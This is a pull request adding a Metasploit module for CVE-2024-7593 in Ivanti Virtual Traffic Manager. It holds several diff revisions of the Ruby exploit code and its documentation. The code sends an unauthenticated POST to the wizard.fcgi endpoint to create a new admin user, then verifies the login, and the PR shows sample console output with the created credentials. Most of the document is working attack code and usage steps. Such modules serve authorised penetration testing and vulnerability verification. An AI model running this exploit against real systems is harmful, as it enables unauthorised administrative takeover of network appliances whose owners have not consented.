### PR TITLE
Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
+++ b/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
@@ -1,13 +1,24 @@
 ## Vulnerable Application
 
-This module exploits an access control issue in Ivanti Virtual Traffic Manager (VTM) 22.7R1, by adding a new
+This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
 administrative user to the web interface of the application.
 
-The original advisory is available [here](https://packetstormsecurity.com/files/179906).
+Affected versions include:
+* 22.2
+* 22.3
+* 22.3R2
+* 22.5R1
+* 22.6R1
+* 22.7R1
+
+The vendor published an advisory [here]
+(https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).
+
+A proof-of-concept is available [here](https://packetstormsecurity.com/files/179906).
 
 ## Testing
 
-The software can be obtained from [here](https://hubgw.docker.com/r/pulsesecure/vtm).
+Docker images with the software are available from [here](https://hubgw.docker.com/r/pulsesecure/vtm).
 
 **Successfully tested on**
 
@@ -15,7 +26,7 @@ The software can be obtained from [here](https://hubgw.docker.com/r/pulsesecure/
 
 ## Verification Steps
 
-1. Deploy Ivanti Virtual Traffic Manager (VTM)
+1. Deploy Ivanti Virtual Traffic Manager (vTM)
 2. Start `msfconsole`
 3. `use auxiliary/admin/http/ivanti_vtm_admin`
 4. `set RHOSTS <IP>`
@@ -32,7 +43,7 @@ Password to be used when creating a new user with admin privileges.
 
 ## Scenarios
 
-Running the module against Virtual Traffic Manager (VTM) 22.7R1 should result in an output
+Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in an output
 similar to the following:
 
 ```

--- a/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
+++ b/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+This module exploits an access control issue in Ivanti Virtual Traffic Manager (VTM) 22.7R1, by adding a new
+administrative user to the web interface of the application.
+
+The original advisory is available [here](https://packetstormsecurity.com/files/179906).
+
+## Testing
+
+The software can be obtained from [here](https://hubgw.docker.com/r/pulsesecure/vtm).
+
+**Successfully tested on**
+
+- 22.7R1 on Ubuntu 20.04.6 LTS
+
+## Verification Steps
+
+1. Deploy Ivanti Virtual Traffic Manager (VTM)
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/ivanti_vtm_admin`
+4. `set RHOSTS <IP>`
+5. `run`
+6. A new admin user should have been added to the web interface.
+
+## Options
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against Virtual Traffic Manager (VTM) 22.7R1 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
+[*] Running module against 172.17.0.2
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 22.7R1
+[+] New admin user was successfully added:
+	h4x0r:w00Tw00T!
+[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
+++ b/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
@@ -4,12 +4,12 @@ This module exploits an access control issue in Ivanti Virtual Traffic Manager (
 administrative user to the web interface of the application.
 
 Affected versions include:
-* 22.2
-* 22.3
-* 22.3R2
-* 22.5R1
-* 22.6R1
 * 22.7R1
+* 22.6R1
+* 22.5R1
+* 22.3R2
+* 22.3
+* 22.2
 
 The vendor published an advisory [here]
 (https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US).
@@ -23,6 +23,10 @@ Docker images with the software are available from [here](https://hubgw.docker.c
 **Successfully tested on**
 
 - 22.7R1 on Ubuntu 20.04.6 LTS
+- 22.6R1 on Ubuntu 20.04.6 LTS
+- 22.5R1 on Ubuntu 20.04.6 LTS
+- 22.3R1 on Ubuntu 20.04.5 LTS
+- 22.2 on Ubuntu 20.04.4 LTS
 
 ## Verification Steps
 

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub('.', '_')]),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub(/[^a-zA-Z0-9_-]/, '_')]),
       OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
     ])
   end
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
     match = body.match(version_regex)
     if match
       version = match[1]
-      return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('22.7R1')
+      return Exploit::CheckCode::Appears("Version: #{version}") if Rex::Version.new(version) <= Rex::Version.new('22.7R1')
     else
       return Exploit::CheckCode::Safe
     end
@@ -88,40 +88,37 @@ class MetasploitModule < Msf::Auxiliary
     html = res.get_html_document
     title_tag = html.at_css('title')
 
-    if title_tag
-      title_text = title_tag.text.strip
-      if title_text == '2'
-        print_status('Request to add new admin user sent, verifying...')
+    fail_with(Failure::UnexpectedReply, 'title tag not found.') unless title_tag
+    title_text = title_tag.text.strip
+    if title_text == '2'
+      print_status('Request to add new admin user sent, verifying...')
 
-        form = Rex::MIME::Message.new
-        form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
-        form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
-        form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
-        form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+      form = Rex::MIME::Message.new
+      form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+      form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+      form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+      form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
 
-        res = send_request_cgi(
-          {
-            'method' => 'POST',
-            'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
-            'ctype' => "multipart/form-data; boundary=#{form.bound}",
-            'data' => form.to_s
-          }
-        )
-        if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
-          store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
-          print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-          print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
-        end
-
-      elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
-        fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
-      elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
-        fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
-      else
-        fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
+      res = send_request_cgi(
+        {
+          'method' => 'POST',
+          'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+          'ctype' => "multipart/form-data; boundary=#{form.bound}",
+          'data' => form.to_s
+        }
+      )
+      if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+        print_good("Login at: #{full_uri(normalize_uri(target_uri, 'apps/zxtm/login.cgi'))}")
       end
+
+    elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
+      fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
+    elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
+      fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
     else
-      fail_with(Failure::UnexpectedReply, 'title tag not found.')
+      fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
     end
   end
 end

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -10,6 +10,8 @@ class MetasploitModule < Msf::Auxiliary
         'Description' => %q{
           This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
           administrative user to the web interface of the application.
+
+          Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.
         },
         'Author' => [
           'Michael Heinzl', # MSF Module

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Auxiliary
             'data' => form.to_s
           }
         )
-        if res && res.code == 302 && res.headers.key?('Set-Cookie') && res.headers['Set-Cookie'].include?('ZeusTMZAUTH_')
+        if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
           store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
           print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
           print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -1,0 +1,63 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass',
+        'Description' => %q{
+          This module exploits an access control issue in Ivanti Virtual Traffic Manager <= 22.7R2, by adding a new
+          administrative user to the web interface of the application.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'ohnoisploited' # Discovery and PoC
+        ],
+        'References' => [
+          ['URL', 'https://packetstormsecurity.com/files/179906']
+        ],
+        'DisclosureDate' => '2024-08-05',
+        'DefaultOptions' => {
+          'RPORT' => 9090
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+    ])
+  end
+
+  def run
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers'),
+      'vars_post' => {
+        '_form_submitted' => 'form',
+        'create_user' => 'Create',
+        'group' => 'admin',
+        'newusername' => datastore['NEW_USERNAME'],
+        'password1' => datastore['NEW_PASSWORD'],
+        'password2' => datastore['NEW_PASSWORD']
+
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+    print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}workflow/jsp/logon.jsp")
+  end
+
+end

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -39,8 +39,8 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
-      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
-      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub('.', '_')]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
     ])
   end
 
@@ -91,11 +91,34 @@ class MetasploitModule < Msf::Auxiliary
     if title_tag
       title_text = title_tag.text.strip
       if title_text == '2'
-        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
-        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-        print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
+        print_status('Request to add new admin user sent, verifying...')
+
+        form = Rex::MIME::Message.new
+        form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+        form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+        form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+        form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+
+        res = send_request_cgi(
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+            'ctype' => "multipart/form-data; boundary=#{form.bound}",
+            'data' => form.to_s
+          }
+        )
+        if res && res.code == 302 && res.headers.key?('Set-Cookie') && res.headers['Set-Cookie'].include?('ZeusTMZAUTH_')
+          store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+          print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+          print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
+        end
+
+      elsif title_text == '0' && html.to_s.include?('ERROR: Specified user already exists')
+        fail_with(Failure::BadConfig, "Specified user already exists. Specify a different user name with 'set NEW_USERNAME <USER>'.")
+      elsif title_text == '0' && html.to_s.include?('ERROR: Username must contain only: letters, numbers,')
+        fail_with(Failure::BadConfig, "Specified username is invalid. Username must contain only letters, numbers, underscores (_), and hyphens (-). Specify a different user name with 'set NEW_USERNAME <USER>'.")
       else
-        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside the title tag: ' + title_text)
+        fail_with(Failure::NotVulnerable, 'Unexpected string found inside the title tag: ' + title_text)
       end
     else
       fail_with(Failure::UnexpectedReply, 'title tag not found.')

--- a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
+++ b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -6,17 +6,20 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass',
+        'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)',
         'Description' => %q{
-          This module exploits an access control issue in Ivanti Virtual Traffic Manager 22.7R1, by adding a new
+          This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new
           administrative user to the web interface of the application.
         },
         'Author' => [
           'Michael Heinzl', # MSF Module
-          'ohnoisploited' # Discovery and PoC
+          'ohnoisploited', # PoC
+          'mxalias' # Credited in the vendor advisory for the discovery, https://hackerone.com/mxalias?type=user
         ],
         'References' => [
-          ['PACKETSTORM', '179906']
+          ['PACKETSTORM', '179906'],
+          ['CVE', '2024-7593'],
+          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US']
         ],
         'DisclosureDate' => '2024-08-05',
         'DefaultOptions' => {


### PR DESCRIPTION
This is a new module which exploits an improper access control vulnerability (CVE-2024-7593) in Ivanti Virtual Traffic Manager (vTM). It allows an unauthenticated remote attacker to add a new administrative user to the web interface of the product.

Affected versions include:
- 22.2
- 22.3
- 22.3R2
- 22.5R1
- 22.6R1
- 22.7R1

## Verification Steps

1. Docker images are available from [here](https://hubgw.docker.com/r/pulsesecure/vtm)
2. Start `msfconsole`
3. `use auxiliary/admin/http/ivanti_vtm_admin`
4. `set RHOSTS <IP>`
5. `run`

A new administrative user should have been added to the web interface of the product.

```
msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[+] New admin user was successfully added:
	h4x0r:w00Tw00T!
[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed
```

**Successfully tested on**

- 22.7R1 on Ubuntu 20.04.6 LTS